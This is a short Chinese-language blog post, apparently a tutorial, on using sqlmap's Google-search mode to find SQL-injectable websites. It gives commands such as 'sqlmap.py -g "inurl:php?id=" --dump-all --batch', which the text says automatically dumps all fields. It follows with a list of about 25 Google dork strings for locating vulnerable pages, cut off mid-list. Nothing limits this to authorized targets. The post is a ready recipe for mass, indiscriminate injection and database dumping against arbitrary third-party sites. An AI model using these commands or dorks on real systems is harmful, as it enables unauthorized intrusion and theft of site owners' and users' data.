利用Google Dorks字符串找到可注入的网站
sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字)
使用示例:
1.
sqlmap.py -g "inurl:php?id="
2.
sqlmap.py -g "inurl:php?id=" --dump-all --batch
google搜索注入点 自动跑出所有字段
部分关键字(根据自己需要的去使用):
inurl:item_id=
inurl:review.php?id=
inurl:hosting_info.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:gallery.php?id=
inurl:trainers.php?id=
inurl:curriculum.php?id=
inurl:rub.php?idr=
inurl:news-full.php?id=
inurl:labels.php?id=
inurl:view_faq.php?id=
inurl:news_display.php?getid=
inurl:story.php?id=
inurl:artikelinfo.php?id=
inurl:index2.php?option=
inurl:look.php?ID=
inurl:detail.php?ID=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:index.php?=
inurl:top10.php?cat=
inurl:aboutbook.php?id=
inurl:profile_view.php?id=
inurl:newsone.php?id=
inurl:material.php?id=
inurl:cat
注入点之Google搜索(附关键字)
最新推荐文章于 2021-04-13 15:50:00 发布